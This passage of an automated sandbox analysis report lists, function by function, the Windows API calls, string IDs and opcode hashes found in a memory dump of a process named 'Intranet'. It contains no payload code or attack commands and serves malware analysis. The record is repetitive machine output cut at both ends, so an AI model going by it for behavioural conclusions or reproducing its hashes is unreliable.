                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower_memmove
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 3425801089-567219261
                                                                            • Opcode ID: a6fd593b630deaa105f635dc7d61ec0df02b32af435d8189d134f8f0478e1e64
                                                                            • Instruction ID: 076eda53042929592b1759d21c9b97fb320c8e087bf75272ef17e9139052175d
                                                                            • Opcode Fuzzy Hash: a6fd593b630deaa105f635dc7d61ec0df02b32af435d8189d134f8f0478e1e64
                                                                            • Instruction Fuzzy Hash: 0231A370900219EFDF00EF54C8519EEBBB4FF14314B10862EF826972E1DB35AA45CBA0
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9ACC
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9ADF
                                                                            • SendMessageW.USER32(?,00000189,?,00000000,?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?), ref: 004F9B0F
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 365058703-1403004172
                                                                            • Opcode ID: 07b09020901165ab8eb36e05330a7b0e1f2856d4165ce523c92fda68c94dd2be
                                                                            • Instruction ID: 65244dec20fa10376a74b6149625c5cc520a40e72f050e08d203d4620a5578de
                                                                            • Opcode Fuzzy Hash: 07b09020901165ab8eb36e05330a7b0e1f2856d4165ce523c92fda68c94dd2be
                                                                            • Instruction Fuzzy Hash: 02212071900108ABCB15ABA1D856EFFBBA8EF45360F10021FF921932E0DA381C0A9668
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00511F18
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00511F3E
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?,00000000), ref: 00511F6E
                                                                            • InternetCloseHandle.WININET(00000000,0000002A,DEADBEEF,00000000), ref: 00511FB5
                                                                              • Part of subcall function 00512B4F: GetLastError.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B64
                                                                              • Part of subcall function 00512B4F: SetEvent.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: 9287097bd718a4d84798c015e43f14962e905b70a70da473bd1023866b549bbf
                                                                            • Instruction ID: 77ca95635c3a10dd2a033fae8781eab57bbfb900de9659227b52971be3852da5
                                                                            • Opcode Fuzzy Hash: 9287097bd718a4d84798c015e43f14962e905b70a70da473bd1023866b549bbf
                                                                            • Instruction Fuzzy Hash: 5A21D0B5504608BFFB119F209C89EFB7BADFB88744F00411AF50592240EB249D559BB5
                                                                            APIs
                                                                              • Part of subcall function 004A2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                              • Part of subcall function 004A2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                              • Part of subcall function 004A2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?,?,00000000,SysAnimate32,00000000,?,?,?,?,?,?,?,00000000), ref: 00526A86
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00526A8D
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00526AA2
                                                                            • DestroyWindow.USER32(?), ref: 00526AAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 48b7d37d45877d6add17cbb3fed050134a2983a8ca820b151f651044d444b4ce
                                                                            • Instruction ID: 1732e83ae8f56c51cad1b2465bc13a5dbbc6e2d32b2316ceff47060a17d79375
                                                                            • Opcode Fuzzy Hash: 48b7d37d45877d6add17cbb3fed050134a2983a8ca820b151f651044d444b4ce
                                                                            • Instruction Fuzzy Hash: 9D215B71200215EFEF108EA4EC91EBB7BADFF6A324F109619FA51A21D0D3719C91A760
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00507377
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005073AA
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 005073BC
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005073F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: f026f433c88f99b5a19c16b8303c615b3beb82572e1757c94559d67c77c28783
                                                                            • Instruction ID: 64fab5075499af95e31ded11835a6debcee6ce59e8a6e2601b363807ed1adb75
                                                                            • Opcode Fuzzy Hash: f026f433c88f99b5a19c16b8303c615b3beb82572e1757c94559d67c77c28783
                                                                            • Instruction Fuzzy Hash: 7B215E7490430EABEB208F64DC09A9E7FA4BF58720F204E19FCA0D72D0D770A950DB50
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00507444
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00507476
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00507487
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005074C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 55d75c115bf621b433ad57f9c4bcb367a1de3a51c036163a39fc36fc6a3d035b
                                                                            • Instruction ID: 82a94a95cc21b777562052edd98e514eb131cf0188ab2ef1e239643d39b52a80
                                                                            • Opcode Fuzzy Hash: 55d75c115bf621b433ad57f9c4bcb367a1de3a51c036163a39fc36fc6a3d035b
                                                                            • Instruction Fuzzy Hash: CD21B23590830EABDF209F689C48A9E7FA8BF59730F200A09FDA0D72D1D7B0A855C751
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0050B297
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0050B2EB
                                                                            • __swprintf.LIBCMT ref: 0050B304
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00530980), ref: 0050B342
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: ce17b25f458c2d86e6c427ed89cdfa512f11d8f4fba7d7d019c8e32b1a9047ae
                                                                            • Instruction ID: 2d2c30bf82a74258eefb3d83c56f507c14ff8f76538e2f18e114b7102dd87d33
                                                                            • Opcode Fuzzy Hash: ce17b25f458c2d86e6c427ed89cdfa512f11d8f4fba7d7d019c8e32b1a9047ae
                                                                            • Instruction Fuzzy Hash: 35217434600209AFCB10DFA5C895DAEBBB8FF89704B10406AF905D7392DB75EA45CB61
                                                                            APIs
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                              • Part of subcall function 004FAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004FAA6F
                                                                              • Part of subcall function 004FAA52: GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 004FAA82
                                                                              • Part of subcall function 004FAA52: GetCurrentThreadId.KERNEL32 ref: 004FAA89
                                                                              • Part of subcall function 004FAA52: AttachThreadInput.USER32(00000000), ref: 004FAA90
                                                                            • GetFocus.USER32(00530980), ref: 004FAC2A
                                                                              • Part of subcall function 004FAA9B: GetParent.USER32(?), ref: 004FAAA9
                                                                            • GetClassNameW.USER32(?,?,00000100,?), ref: 004FAC73
                                                                            • EnumChildWindows.USER32(?,004FACEB,?,?), ref: 004FAC9B
                                                                            • __swprintf.LIBCMT ref: 004FACB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                            • String ID: %s%d
                                                                            • API String ID: 1941087503-1110647743
                                                                            • Opcode ID: 72c13f0caee000228cd3ddc717b181a3cdc2bbd1c65fe3652de669aef523eaa3
                                                                            • Instruction ID: c5e9b919026c6d0a105a2eda2da14e8972d86da4033c1d7d947f999c4858d944
                                                                            • Opcode Fuzzy Hash: 72c13f0caee000228cd3ddc717b181a3cdc2bbd1c65fe3652de669aef523eaa3
                                                                            • Instruction Fuzzy Hash: 5A11D5B5600208ABCF11BFA1CD95FFA376CAB44704F00407AFE0C9A182CA7859599B79
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00502318
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: 24d96d9ea53ec60c9fc9b6925dc7f0c68df9b2995c734f9e5d9e811348b492c4
                                                                            • Instruction ID: cfc1bc6e19704b43b7c4b439ad3e86be486c5d4231c58ca0d7d171889906b2a1
                                                                            • Opcode Fuzzy Hash: 24d96d9ea53ec60c9fc9b6925dc7f0c68df9b2995c734f9e5d9e811348b492c4
                                                                            • Instruction Fuzzy Hash: AB115234900118DFCF40DFA4D9699EEBBB8FF15344F50845EE815572A1DB365E0ACB50
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0051F2F0
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0051F320
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0051F453
                                                                            • CloseHandle.KERNEL32(?), ref: 0051F4D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: 0ea7cb5c63b90f398bcf7a485e37adcd838c750905ea131cbf30d607bad2d588
                                                                            • Instruction ID: 6aa93fc4e60820e6086b69c0af48642729062ccb85a259a005b7518de4cf9b79
                                                                            • Opcode Fuzzy Hash: 0ea7cb5c63b90f398bcf7a485e37adcd838c750905ea131cbf30d607bad2d588
                                                                            • Instruction Fuzzy Hash: 818191756003009FE720EF29D842F6EB7E5AF94714F14881EF999DB392D7B4AC408B56
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1559183368-0
                                                                            • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                            • Instruction ID: 29ef2232e4d7b840d2b85148b320d69c3e8016e2fc10a27227a96b2a2434bbec
                                                                            • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                            • Instruction Fuzzy Hash: 4051A938B01B05DBDB548E698880F6F77A5AF40324F24472FF829962D0D778BDD19B49
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0052075D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0052079C
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005207E3
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0052080F
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0052081C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3440857362-0
                                                                            • Opcode ID: c861978c08eb592c491c90018bbdd1bc99d9ef1a9ffd1fee513c777ae4d9d48e
                                                                            • Instruction ID: 25be048b5aa8016b587bf15e99866106939698c41a90335606f3874a20eceb91
                                                                            • Opcode Fuzzy Hash: c861978c08eb592c491c90018bbdd1bc99d9ef1a9ffd1fee513c777ae4d9d48e
                                                                            • Instruction Fuzzy Hash: 91516831208204AFD704EF64D895E6BBBE9FF85308F44891EF595872E2DB34E905CB96
                                                                            APIs
                                                                              • Part of subcall function 00518475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005184A0
                                                                            • #23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00516E89
                                                                            • #111.WSOCK32(00000000), ref: 00516EB2
                                                                            • #2.WSOCK32(00000000,?,00000010), ref: 00516EEB
                                                                            • #111.WSOCK32(00000000), ref: 00516EF8
                                                                            • #3.WSOCK32(00000000,00000000), ref: 00516F0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #111
                                                                            • String ID:
                                                                            • API String ID: 568940515-0
                                                                            • Opcode ID: 0a1b9a923b0f3e070a96ffa66d21647652371c5520f874243ba1166e439d673c
                                                                            • Instruction ID: f20d97dc78ad11ba0915fea37569da4c77d18a43d7d89082e865ddb00bec4d78
                                                                            • Opcode Fuzzy Hash: 0a1b9a923b0f3e070a96ffa66d21647652371c5520f874243ba1166e439d673c
                                                                            • Instruction Fuzzy Hash: 29410B756002006FDB10AF65DC86FBE77A8EF95718F00855DF9159B3C2CBB86D004B95
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0051E010
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0051E093
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0051E0AF
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0051E0F0
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0051E10A
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00507E51,?,?,00000000), ref: 004B4041
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00507E51,?,?,00000000,?,?), ref: 004B4065
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 327935632-0
                                                                            • Opcode ID: 9a0f0687c86e77cc51045939170eb416f9056fae7355494c5449ebc36c17a9f4
                                                                            • Instruction ID: b9d59f51050a22bc5df84614afea6852354b650fb7993ccfac895d74754feb8a
                                                                            • Opcode Fuzzy Hash: 9a0f0687c86e77cc51045939170eb416f9056fae7355494c5449ebc36c17a9f4
                                                                            • Instruction Fuzzy Hash: F0515935A00209DFDB00EF68C8958EDBBF4FF59314B14805AE915AB352D734AD85CF95
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0050EC62
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0050EC8B
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0050ECCA
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0050ECEF
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0050ECF7
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
